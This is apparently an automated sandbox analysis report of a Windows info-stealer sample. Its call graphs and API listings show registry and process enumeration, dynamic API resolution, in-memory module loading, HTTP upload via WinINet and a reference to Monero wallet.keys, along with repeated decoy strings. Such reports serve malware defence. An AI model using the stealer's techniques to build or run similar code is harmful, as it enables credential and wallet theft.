15758->15759 15760 fc83ae 15759->15760 15762 fc83d0 15759->15762 15761 fca7a0 lstrcpy 15760->15761 15774 fc83bd 15761->15774 15763 fc83f8 RegEnumKeyExA 15762->15763 15764 fc8613 RegCloseKey 15762->15764 15765 fc860e 15763->15765 15766 fc843f wsprintfA RegOpenKeyExA 15763->15766 15767 fca7a0 lstrcpy 15764->15767 15765->15764 15768 fc8485 RegCloseKey RegCloseKey 15766->15768 15769 fc84c1 RegQueryValueExA 15766->15769 15767->15774 15770 fca7a0 lstrcpy 15768->15770 15771 fc84fa lstrlen 15769->15771 15772 fc8601 RegCloseKey 15769->15772 15770->15774 15771->15772 15773 fc8510 15771->15773 15772->15765 15775 fca9b0 4 API calls 15773->15775 15774->15217 15776 fc8527 15775->15776 15777 fca8a0 lstrcpy 15776->15777 15778 fc8533 15777->15778 15779 fca9b0 4 API calls 15778->15779 15780 fc8557 15779->15780 15781 fca8a0 lstrcpy 15780->15781 15782 fc8563 15781->15782 15783 fc856e RegQueryValueExA 15782->15783 15783->15772 15784 fc85a3 15783->15784 15785 fca9b0 4 API calls 15784->15785 15786 fc85ba 15785->15786 15787 fca8a0 lstrcpy 15786->15787 15788 fc85c6 15787->15788 15789 fca9b0 4 API calls 15788->15789 15790 fc85ea 15789->15790 15791 fca8a0 lstrcpy 15790->15791 15792 fc85f6 15791->15792 15792->15772 15794 fca740 lstrcpy 15793->15794 15795 fc86bc CreateToolhelp32Snapshot Process32First 15794->15795 15796 fc875d CloseHandle 15795->15796 15797 fc86e8 Process32Next 15795->15797 15798 fca7a0 lstrcpy 15796->15798 15797->15796 15802 fc86fd 15797->15802 15799 fc8776 15798->15799 15799->15249 15800 fca8a0 lstrcpy 15800->15802 15801 fca9b0 lstrcpy lstrlen lstrcpy lstrcat 15801->15802 15802->15797 15802->15800 15802->15801 15804 fca7a0 lstrcpy 15803->15804 15805 fc51b5 15804->15805 15806 fb1590 lstrcpy 15805->15806 15807 fc51c6 15806->15807 15822 fb5100 15807->15822 15809 fc51cf 15809->15261 15813 fc7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15810->15813 15812 fc76b9 15812->15685 15812->15686 15814 fc7765 RegQueryValueExA 15813->15814 15815 fc7780 RegCloseKey 15813->15815 15814->15815 15816 fc7793 15815->15816 15816->15812 15817->15699 15819 fc8a0c 15818->15819 15820 fc89f9 GetProcessHeap HeapFree 15818->15820 15819->15735 15820->15819 15821->15735 15823 fca7a0 lstrcpy 15822->15823 15824 fb5119 15823->15824 15825 fb47b0 2 API calls 15824->15825 15826 fb5125 15825->15826 15982 fc8ea0 15826->15982 15828 fb5184 15829 fb5192 lstrlen 15828->15829 15830 fb51a5 15829->15830 15831 fc8ea0 4 API calls 15830->15831 15832 fb51b6 15831->15832 15833 fca740 lstrcpy 15832->15833 15834 fb51c9 15833->15834 15835 fca740 lstrcpy 15834->15835 15836 fb51d6 15835->15836 15837 fca740 lstrcpy 15836->15837 15838 fb51e3 15837->15838 15839 fca740 lstrcpy 15838->15839 15840 fb51f0 15839->15840 15841 fca740 lstrcpy 15840->15841 15842 fb51fd InternetOpenA StrCmpCA 15841->15842 15843 fb522f 15842->15843 15844 fb58c4 InternetCloseHandle 15843->15844 15845 fc8b60 3 API calls 15843->15845 15851 fb58d9 codecvt 15844->15851 15846 fb524e 15845->15846 15847 fca920 3 API calls 15846->15847 15848 fb5261 15847->15848 15849 fca8a0 lstrcpy 15848->15849 15850 fb526a 15849->15850 15852 fca9b0 4 API calls 15850->15852 15855 fca7a0 lstrcpy 15851->15855 15853 fb52ab 15852->15853 15854 fca920 3 API calls 15853->15854 15856 fb52b2 15854->15856 15863 fb5913 15855->15863 15857 fca9b0 4 API calls 15856->15857 15858 fb52b9 15857->15858 15859 fca8a0 lstrcpy 15858->15859 15860 fb52c2 15859->15860 15861 fca9b0 4 API calls 15860->15861 15862 fb5303 15861->15862 15864 fca920 3 API calls 15862->15864 15863->15809 15865 fb530a 15864->15865 15866 fca8a0 lstrcpy 15865->15866 15867 fb5313 15866->15867 15868 fb5329 InternetConnectA 15867->15868 15868->15844 15869 fb5359 HttpOpenRequestA 15868->15869 15871 fb58b7 InternetCloseHandle 15869->15871 15872 fb53b7 15869->15872 15871->15844 15873 fca9b0 4 API calls 15872->15873 15874 fb53cb 15873->15874 15875 fca8a0 lstrcpy 15874->15875 15876 fb53d4 15875->15876 15877 fca920 3 API calls 15876->15877 15878 fb53f2 15877->15878 15879 fca8a0 lstrcpy 15878->15879 15880 fb53fb 15879->15880 15881 fca9b0 4 API calls 15880->15881 15882 fb541a 15881->15882 15883 fca8a0 lstrcpy 15882->15883 15884 fb5423 15883->15884 15885 fca9b0 4 API calls 15884->15885 15886 fb5444 15885->15886 15887 fca8a0 lstrcpy 15886->15887 15888 fb544d 15887->15888 15889 fca9b0 4 API calls 15888->15889 15890 fb546e 15889->15890 15891 fca8a0 lstrcpy 15890->15891 15983 fc8ead CryptBinaryToStringA 15982->15983 15985 fc8ea9 15982->15985 15984 fc8ece GetProcessHeap RtlAllocateHeap 15983->15984 15983->15985 15984->15985 15986 fc8ef4 codecvt 15984->15986 15985->15828 15987 fc8f05 CryptBinaryToStringA 15986->15987 15987->15985 15991->15264 16234 fb9880 15992->16234 15994 fb98e1 15994->15271 15996 fca740 lstrcpy 15995->15996 16169 fca740 lstrcpy 16168->16169 16170 fc0266 16169->16170 16171 fc8de0 2 API calls 16170->16171 16172 fc027b 16171->16172 16173 fca920 3 API calls 16172->16173 16174 fc028b 16173->16174 16175 fca8a0 lstrcpy 16174->16175 16176 fc0294 16175->16176 16177 fca9b0 4 API calls 16176->16177 16178 fc02b8 16177->16178 16235 fb988e 16234->16235 16238 fb6fb0 16235->16238 16237 fb98ad codecvt 16237->15994 16241 fb6d40 16238->16241 16242 fb6d59 16241->16242 16243 fb6d63 16241->16243 16242->16237 16257 fb6530 16243->16257 16247 fb6dbe 16247->16242 16267 fb69b0 16247->16267 16249 fb6e2a 16249->16242 16250 fb6ef7 16249->16250 16251 fb6ee6 VirtualFree 16249->16251 16252 fb6f38 16250->16252 16253 fb6f26 FreeLibrary 16250->16253 16256 fb6f41 16250->16256 16251->16250 16255 fc89f0 2 API calls 16252->16255 16253->16250 16254 fc89f0 2 API calls 16254->16242 16255->16256 16256->16242 16256->16254 16259 fb6542 16257->16259 16258 fb6549 16258->16242 16261 fb6660 16258->16261 16259->16258 16277 fc8a10 GetProcessHeap RtlAllocateHeap 16259->16277 16262 fb668f VirtualAlloc 16261->16262 16264 fb6730 16262->16264 16266 fb673c 16262->16266 16265 fb6743 VirtualAlloc 16264->16265 16264->16266 16265->16266 16266->16247 16268 fb69c9 16267->16268 16273 fb69d5 16267->16273 16269 fb6a09 LoadLibraryA 16268->16269 16268->16273 16270 fb6a32 16269->16270 16269->16273 16271 fb6ae0 16270->16271 16278 fc8a10 GetProcessHeap RtlAllocateHeap 16270->16278 16271->16273 16274 fb6ba8 GetProcAddress 16271->16274 16273->16249 16274->16271 16274->16273 16275 fc89f0 2 API calls 16275->16271 16276 fb6a8b 16276->16273 16276->16275 16277->16258 16278->16276

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 fc9860-fc9874 call fc9750 663 fc987a-fc9a8e call fc9780 GetProcAddress * 21 660->663 664 fc9a93-fc9af2 LoadLibraryA * 5 660->664 663->664 666 fc9b0d-fc9b14 664->666 667 fc9af4-fc9b08 GetProcAddress 664->667 668 fc9b46-fc9b4d 666->668 669 fc9b16-fc9b41 GetProcAddress * 2 666->669 667->666 671 fc9b4f-fc9b63 GetProcAddress 668->671 672 fc9b68-fc9b6f 668->672 669->668 671->672 673 fc9b89-fc9b90 672->673 674 fc9b71-fc9b84 GetProcAddress 672->674 675 fc9bc1-fc9bc2 673->675 676 fc9b92-fc9bbc GetProcAddress * 2 673->676 674->673 676->675
                              APIs
                              • GetProcAddress.KERNEL32(77190000,00DDDBB0), ref: 00FC98A1
                              • GetProcAddress.KERNEL32(77190000,00DDDBE0), ref: 00FC98BA
                              • GetProcAddress.KERNEL32(77190000,00DDDAA8), ref: 00FC98D2
                              • GetProcAddress.KERNEL32(77190000,00DE8C40), ref: 00FC98EA
                              • GetProcAddress.KERNEL32(77190000,00DE8CD0), ref: 00FC9903
                              • GetProcAddress.KERNEL32(77190000,00DE9168), ref: 00FC991B
                              • GetProcAddress.KERNEL32(77190000,00DD5FF0), ref: 00FC9933
                              • GetProcAddress.KERNEL32(77190000,00DD5FB0), ref: 00FC994C
                              • GetProcAddress.KERNEL32(77190000,00DE8CA0), ref: 00FC9964
                              • GetProcAddress.KERNEL32(77190000,00DE8D48), ref: 00FC997C
                              • GetProcAddress.KERNEL32(77190000,00DE8BC8), ref: 00FC9995
                              • GetProcAddress.KERNEL32(77190000,00DE8C10), ref: 00FC99AD
                              • GetProcAddress.KERNEL32(77190000,00DD6130), ref: 00FC99C5
                              • GetProcAddress.KERNEL32(77190000,00DE8BE0), ref: 00FC99DE
                              • GetProcAddress.KERNEL32(77190000,00DE8C58), ref: 00FC99F6
                              • GetProcAddress.KERNEL32(77190000,00DD5F50), ref: 00FC9A0E
                              • GetProcAddress.KERNEL32(77190000,00DE8D60), ref: 00FC9A27
                              • GetProcAddress.KERNEL32(77190000,00DE8C28), ref: 00FC9A3F
                              • GetProcAddress.KERNEL32(77190000,00DD6150), ref: 00FC9A57
                              • GetProcAddress.KERNEL32(77190000,00DE8D30), ref: 00FC9A70
                              • GetProcAddress.KERNEL32(77190000,00DD6170), ref: 00FC9A88
                              • LoadLibraryA.KERNEL32(00DE8CB8,?,00FC6A00), ref: 00FC9A9A
                              • LoadLibraryA.KERNEL32(00DE8B98,?,00FC6A00), ref: 00FC9AAB
                              • LoadLibraryA.KERNEL32(00DE8CE8,?,00FC6A00), ref: 00FC9ABD
                              • LoadLibraryA.KERNEL32(00DE8C70,?,00FC6A00), ref: 00FC9ACF
                              • LoadLibraryA.KERNEL32(00DE8BB0,?,00FC6A00), ref: 00FC9AE0
                              • GetProcAddress.KERNEL32(76850000,00DE8C88), ref: 00FC9B02
                              • GetProcAddress.KERNEL32(77040000,00DE8D00), ref: 00FC9B23
                              • GetProcAddress.KERNEL32(77040000,00DE8BF8), ref: 00FC9B3B
                              • GetProcAddress.KERNEL32(75A10000,00DE8D18), ref: 00FC9B5D
                              • GetProcAddress.KERNEL32(75690000,00DD60B0), ref: 00FC9B7E
                              • GetProcAddress.KERNEL32(776F0000,00DE9108), ref: 00FC9B9F
                              • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00FC9BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00FC9BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: fa69084b1ebd50339cf777fd99be4abb4d28758e3a8faff5862cc1d2f9b3d25c
                              • Instruction ID: b80a9100788e59a98e35383e9003f1d91a589ada4127d525645c6287aea7d499
                              • Opcode Fuzzy Hash: fa69084b1ebd50339cf777fd99be4abb4d28758e3a8faff5862cc1d2f9b3d25c
                              • Instruction Fuzzy Hash: D6A14CB55046019FD36CDBA9F598D5637F9FF88342B04863EA62E8320CD67EA8C1CB50

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 fb45c0-fb4695 RtlAllocateHeap 781 fb46a0-fb46a6 764->781 782 fb474f-fb47a9 VirtualProtect 781->782 783 fb46ac-fb474a 781->783 783->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FB460E
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00FB479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB45F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB45DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB45D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB46AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB46B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB45C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB46C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB46D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB45E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB46CD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 16420cbbf35280daa98b6e8537a1929d84bf6347a5ea07b8be9770cfc61bd0ec
                              • Instruction ID: f352a9f2d6fbfc68fef9185d3784658e73bbe4d6f593df1b633409bf0db49a3c
                              • Opcode Fuzzy Hash: 16420cbbf35280daa98b6e8537a1929d84bf6347a5ea07b8be9770cfc61bd0ec
                              • Instruction Fuzzy Hash: 2A41E5647C5704EAC66CB7A5884DEDD7B57DFC6F01F68508FA80B52380CA70B900E5A7

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 fb4880-fb4942 call fca7a0 call fb47b0 call fca740 * 5 InternetOpenA StrCmpCA 816 fb494b-fb494f 801->816 817 fb4944 801->817 818 fb4ecb-fb4ef3 InternetCloseHandle call fcaad0 call fb9ac0 816->818 819 fb4955-fb4acd call fc8b60 call fca920 call fca8a0 call fca800 * 2 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca920 call fca8a0 call fca800 * 2 InternetConnectA 816->819 817->816 829 fb4f32-fb4fa2 call fc8990 * 2 call fca7a0 call fca800 * 8 818->829 830 fb4ef5-fb4f2d call fca820 call fca9b0 call fca8a0 call fca800 818->830 819->818 905 fb4ad3-fb4ad7 819->905 830->829 906 fb4ad9-fb4ae3 905->906 907 fb4ae5 905->907 908 fb4aef-fb4b22 HttpOpenRequestA 906->908 907->908 909 fb4b28-fb4e28 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca740 call fca920 * 2 call fca8a0 call fca800 * 2 call fcaad0 lstrlen call fcaad0 * 2 lstrlen call fcaad0 HttpSendRequestA 908->909 910 fb4ebe-fb4ec5 InternetCloseHandle 908->910 1021 fb4e32-fb4e5c InternetReadFile 909->1021 910->818 1022 fb4e5e-fb4e65 1021->1022 1023 fb4e67-fb4eb9 InternetCloseHandle call fca800 1021->1023 1022->1023 1024 fb4e69-fb4ea7 call fca9b0 call fca8a0 call fca800 1022->1024 1023->910 1024->1021
                              APIs
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                                • Part of subcall function 00FB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FB4915
                              • StrCmpCA.SHLWAPI(?,00DEEA08), ref: 00FB493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00FD0DDB,00000000,?,?,00000000,?,",00000000,?,00DEEAD8), ref: 00FB4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FB4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FB4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FB4E49
                              • InternetCloseHandle.WININET(00000000), ref: 00FB4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00FB4EC5
                              • HttpOpenRequestA.WININET(00000000,00DEEA18,?,00DEE100,00000000,00000000,00400100,00000000), ref: 00FB4B15
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                              • InternetCloseHandle.WININET(00000000), ref: 00FB4ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
